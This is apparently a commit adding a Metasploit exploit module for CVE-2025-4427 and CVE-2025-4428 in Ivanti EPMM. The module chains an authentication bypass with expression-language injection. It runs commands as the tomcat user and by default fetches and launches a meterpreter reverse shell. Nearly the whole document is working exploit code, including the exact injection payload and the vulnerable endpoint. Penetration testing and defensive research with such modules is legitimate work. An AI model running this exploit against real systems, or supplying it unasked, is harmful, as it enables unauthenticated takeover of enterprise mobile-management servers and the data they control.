Add ivanti_epmm_rce_cve_2025_4427_4428.rb

Add a module for CVE-2025-4427 and CVE-2025-4428, unauthenticated RCE chain in Ivanti EPMM.

Author: remmons-r7

modules/exploits/multi/http/ivanti_epmm_rce_cve_2025_4427_4428.rb

@@ -0,0 +1,142 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Ivanti EPMM Authentication Bypass for Expression Language Remote Code Execution',
+        'Description' => %q{
+          This module exploits an unauthenticated remote code execution exploit chain for Ivanti EPMM,
+          tracked as CVE-2025-4427 and CVE-2025-4428. An authentication flaw permits unauthenticated
+          access to an administrator web API endpoint, which allows for code execution via expression
+          language injection. This module executes in the context of the 'tomcat' user. This module
+          should also work on many versions of MobileIron Core (rebranded as Ivanti EPMM).
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'CERT-EU', # Original discovery
+          'Sonny Macdonald & Piotr Bazydlo', # First published PoC
+          'remmons-r7' # MSF Exploit
+        ],
+        'References' => [
+          ['CVE', '2025-4427'],
+          ['CVE', '2025-4428'],
+          # Advisory
+          ['URL', 'https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM?language=en_US'],
+          # First published PoC
+          ['URL', 'https://github.com/watchtowrlabs/watchTowr-vs-Ivanti-EPMM-CVE-2025-4427-CVE-2025-4428'],
+          # Non-blind payload
+          ['URL', 'https://blog.eclecticiq.com/china-nexus-threat-actor-actively-exploiting-ivanti-endpoint-manager-mobile-cve-2025-4428-vulnerability']
+        ],
+        'DisclosureDate' => '2025-05-13',
+        # Runs as the 'tomcat' user
+        'Privileged' => false,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD],
+        'DefaultTarget' => 0,
+        'Targets' => [ [ 'Default', {} ] ],
+        'DefaultOptions' => {
+          # cwd is not writable, so use /var/tmp, which is on an executable partition and can be written to
+          'FETCH_WRITABLE_DIR' => '/var/tmp',
+          # After updating Metasploit, the payload began defaulting to aarch64 for some reason
+          # Specifying x64 here to ensure a sane default
+          'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp'
+        },
+        'Notes' => {
+          # Confirmed to work multiple times in a row and concurrently
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptString.new('TARGETURI', [true, 'The base path to Ivanti EPMM', '/']),
+        OptBool.new('SSL', [true, 'Negotiate SSL/TLS for outgoing connections', true])
+      ]
+    )
+  end
+
+  def check
+    # Execute 'id' to check if target is vulnerable (version check via exploitation, best known approach)
+    resp = execute_command('id')
+    return CheckCode::Unknown('Failed to get a response from the target') unless resp
+
+    # The response body format will vary across versions, so check for presence of 'id' output
+    if resp.body.include?('uid=') && resp.body.include?('gid=')
+      return CheckCode::Vulnerable('Successfully executed command')
+    else
+      return CheckCode::Safe('Target does not appear to be vulnerable - command output not returned')
+    end
+  end
+
+  def execute_command(cmd)
+    # Since the execution context only supports one command at a time, split on fetch payload semicolons
+    commands = cmd.split(';')
+    resp = nil
+
+    commands.each_with_index do |command, index|
+      command = command.strip
+      next if command.empty?
+
+      # An update to Metasploit in early 2025 changed the way that fetch payloads are constructed
+      # Previously, fetch payloads appended " &" to the execution command, but now only "&" is appended
+      # For example, "/var/tmp/EHDjrJnB &" -> "/var/tmp/EHDjrJnB&"
+      # The expression language execution context doesn't like it unless there's a space, so we add one
+      command = command.gsub('&', ' &')
+
+      vprint_status("Payload pt. #{index + 1}/#{commands.length}: #{command}")
+
+      # Non-blind payload reportedly being used in the wild, returns stdout in response body
+      payload = "${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('#{command}').getInputStream()).useDelimiter('%5C%5CA').next()}"
+
+      vprint_status("Sending template payload: #{payload}")
+
+      resp = send_request_cgi(
+        'method' => 'GET',
+        # There are multiple API endpoint targets, but this works on MobileIron Core and the rebranded EPMM
+        'uri' => normalize_uri(target_uri.path, 'mifs', 'rs', 'api', 'v2', 'featureusage'),
+        'vars_get' => {
+          'format' => payload
+        },
+        # Setting this timeout lower than the default, since the third request will not receive a response
+        # Per https://github.com/rapid7/metasploit-framework/issues/12004
+        'timeout' => 7.5
+      )
+
+      # The third fetch payload command (executing meterpreter) should hang and fail to respond
+      # If there's no response and it's not the third fetch payload, the exploit failed
+      if index != 2
+        unless resp
+          fail_with(Failure::Unknown, "Failed to execute command pt #{index + 1}: #{command}")
+        end
+
+        vprint_status("Command pt #{index + 1} response: #{resp.body}")
+
+      else
+        vprint_status('No command pt 3 response expected')
+      end
+    end
+
+    resp
+  end
+
+  def exploit
+    # We pass the encoded payload to execute_command
+    # That will split it up into three commands to execute, and it'll also handle error conditions
+    vprint_status('Attempting to execute payload')
+    execute_command(payload.encoded)
+  end
+end